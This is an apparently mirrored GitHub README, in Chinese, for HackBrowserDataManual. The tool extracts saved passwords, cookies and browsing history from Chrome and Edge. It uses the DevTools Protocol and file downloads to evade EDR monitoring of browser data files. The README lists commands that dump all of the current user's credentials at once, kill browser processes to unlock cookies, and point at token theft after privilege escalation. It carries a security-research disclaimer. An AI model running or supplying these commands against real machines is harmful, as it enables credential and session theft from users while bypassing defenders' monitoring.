Git Product home page Git Product logo

hackbrowserdatamanual's Introduction

HackBrowserDataManual

HackBrowserData的偏手动版,用于绕过特定情况下edr的限制

魔改自HackBrowserData
原理部分查看我的这篇博客HackBrowserDataManual开发日记 用于应对特殊情况下edr等软件监控了chrome的数据文件导致无法还原密码的问题
仅在本地win10,win11上实验通过(虽然理论上我感觉应该能在linux和Mac上运行)

使用Chrome DevTools Protocol控制浏览器,通过文件下载以及file协议等方式使用浏览器进程获取数据文件,绕过监控

需注意windows下浏览器密码解密需要DPAPI的参与,因此仅支持解密当前用户的密码,若提权至system权限,需手动窃取token等方式切换用户上下文
用户数据文件的定位是依赖于家目录的,非默认情况下同样需要自行指定用户数据文件位置

Disclaimer

本工具仅用于安全研究,提出一种edr监控浏览器文件后的绕过读取思路。 请勿使用于任何非法用途,严禁使用该项目对计算机信息系统进行攻击。由此产生的后果由使用者自行承担。

Build

与HackBrowserData相同,sqlite依赖需要CGO_ENABLED=1下编译

Usage

目前仅支持chrome和edge,理论上可以支持所有chromium内核的浏览器,但是我懒得整哈哈

$ ./HackBrowserDataManual.exe
extract password/history/cookie.
bypass edr monitor of browser data file by using Chromium devtools protocol

Usage:
  go_build_HackBrowserDataManual.exe [command]

Available Commands:
  devtool     Using dev tool protocol to extract cookies.
  download    download file via dev tool protocol
  help        Help about any command
  run         Parse browser cookie, password and history

Flags:
  -b, --browser string   browser(chrome/edge) (default "chrome")
  -h, --help             help for go_build_HackBrowserDataManual.exe
  -l, --log string       log level(info, error) (default "info")

Use "HackBrowserDataManual.exe [command] --help" for more information about a command.

run

run命令一把梭当前用户的浏览器密码,cookie和history

需注意cookie只有当不存在浏览器进程时才可获取。若存在浏览器进程,可使用--kill选项关闭所有浏览器进程

$ ./HackBrowserDataManual.exe help run
Parse browser cookie, password and history

Usage:
  go_build_HackBrowserDataManual.exe run [flags]
  go_build_HackBrowserDataManual.exe run [command]

Available Commands:
  cookie      Parse browser cookie file
  history     Parse browser history file
  password    Parse browser Password file

Flags:
  -f, --format string   Output format(csv/json) (default "csv")
  -h, --help            help for run

Global Flags:
  -b, --browser string   browser(chrome/edge) (default "chrome")
  -l, --log string       log level(info, error) (default "info")

examples

如下命令直接梭当前用户默认目录下的chrome密码,cookie和history

./HackBrowserDataManual.exe run

使用-b flag指定其他浏览器(目前只支持chrome和edge)

./HackBrowserDataManual.exe run -b edge

如果梭不通或者出问题可以使用其下的的cookie,history和password三个子命令单独获取数据。如:

./HackBrowserDataManual.exe run cookie

存在chrome进程需要关闭后才能获取cookie

./HackBrowserDataManual.exe run cookie --kill

指定输出文件名,使用run命令一把梭时不支持指定文件名

./HackBrowserDataManual.exe run cookie -o /output/filename

cookie文件和masterKey位于非常规位置时

./HackBrowserDataManual.exe run cookie -i /path/to/cookieFile -k /path/to/keyfile

devtools子命令使用devtools protocol直接从浏览器中还原全部cookie devtools命令user data dir位于非常规位置

./HackBrowserDataManual.exe devtools -d /user/dir

download子命令将制定文件下载到当前文件夹

./HackBrowserDataManual.exe download /path/to/downloadfile

hackbrowserdatamanual's People

Contributors

z3ratu1 avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar

Forkers

passwa11 freeide arr3sty0u koushui exi1sh0w deidarayu kagantua

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.